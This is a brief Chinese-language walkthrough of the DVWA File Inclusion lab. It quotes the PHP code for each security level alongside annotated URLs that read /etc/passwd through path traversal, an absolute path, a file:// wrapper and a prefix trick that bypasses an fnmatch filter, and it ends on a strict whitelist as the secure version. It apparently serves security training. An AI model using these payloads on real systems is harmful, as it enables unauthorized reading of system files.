DVWA File Inclusion 过关秘籍

1// 非常单纯, 随便读取
2// http://192.168.32.114/vulnerabilities/fi/?page=../../../../../../etc/passwd
3// The page we wish to display
4$file = $_GET[ 'page' ];

 1// The page we wish to display
 2$file = $_GET[ 'page' ];
 3
 4// 过滤一部分字符
 5// 不允许 HTTP,HTTPS 协议
 6// 利用目录结构读取也不行
 7
 8// 然而没有过滤全
 9// http://192.168.32.114/vulnerabilities/fi/?page=/etc/passwd
10
11// Input validation
12$file = str_replace( array( "http://", "https://" ), "", $file );
13$file = str_replace( array( "../", "..\"" ), "", $file );

 1// The page we wish to display
 2$file = $_GET[ 'page' ];
 3
 4// Input validation
 5// 对$file 字符串做匹配
 6// 只能匹配 file* 的文件路径
 7// 还有 include.php 文件路径
 8
 9// 这个过滤还是八星
10// 利用`本地文件传输协议`
11// http://192.168.32.114/vulnerabilities/fi/?page=file:///etc/passwd
12
13// 或者这样
14// http://192.168.32.114/vulnerabilities/fi/?page=file123123/../../../../../../etc/passwd
15
16if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
17    // This isn't the page we want!
18    echo "ERROR: File not found!";
19    exit;
20}

 1// The page we wish to display
 2$file = $_GET[ 'page' ];
 3
 4// Only allow include.php or file{1..3}.php
 5// 强匹配
 6// 从程序员的角度来说这种代码的维护性极差
 7// 从安全的角度上来说这是最安全的方案
 8if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
 9    // This isn't the page we want!
10    echo "ERROR: File not found!";
11    exit;
12}